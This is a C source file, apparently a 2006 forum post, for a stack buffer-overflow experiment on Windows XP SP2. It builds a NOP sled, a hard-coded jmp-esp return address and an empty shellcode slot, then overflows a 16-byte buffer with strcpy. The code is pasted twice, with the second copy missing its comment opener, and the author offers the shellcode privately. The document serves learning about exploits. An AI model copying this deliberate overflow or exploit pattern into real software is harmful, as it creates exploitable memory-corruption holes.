/*
* 文件名:SimpleBufferOverflow.c
* 用途:缓冲区溢出实验
* 编程环境:WinXP SP2+CL 8.0
* 完成日期: 2006.4 Ver 0.01
* 作者: 88250
* 联系方式: E-mail: [email protected] QQ:845765
*/
#include <stdio.h>
#include <string.h>
#include <windows.h>
char largebuff[512];
#define JUMPESP "GtÒw"
char shellcode[] = "";
void fun(){
printf("test,being hacked!!! ");
}
mycopy(char largebuff[])
{
char smallbuff[16];
strcpy(smallbuff,largebuff);
}
int main (void)
{
HINSTANCE h = LoadLibrary("user32");
memset(largebuff,0x90,sizeof(largebuff)-1);
strcpy(largebuff+20,JUMPESP);
strcpy(largebuff+24,shellcode);
mycopy(largebuff);
FreeLibrary(h);
// printf("buf's 0x%8x ",largebuff);
// printf("fun is at 0x%8x ",fun);
}
* 文件名:SimpleBufferOverflow.c
* 用途:缓冲区溢出实验
* 编程环境:WinXP SP2+CL 8.0
* 完成日期: 2006.4 Ver 0.01
* 作者: 88250
* 联系方式: E-mail: [email protected] QQ:845765
*/
#include <stdio.h>
#include <string.h>
#include <windows.h>
char largebuff[512];
#define JUMPESP "GtÒw"
char shellcode[] = "";
void fun(){
printf("test,being hacked!!! ");
}
mycopy(char largebuff[])
{
char smallbuff[16];
strcpy(smallbuff,largebuff);
}
int main (void)
{
HINSTANCE h = LoadLibrary("user32");
memset(largebuff,0x90,sizeof(largebuff)-1);
strcpy(largebuff+20,JUMPESP);
strcpy(largebuff+24,shellcode);
mycopy(largebuff);
FreeLibrary(h);
// printf("buf's 0x%8x ",largebuff);
// printf("fun is at 0x%8x ",fun);
}
shellcode不能贴进来,需要的人可以联系我。。。。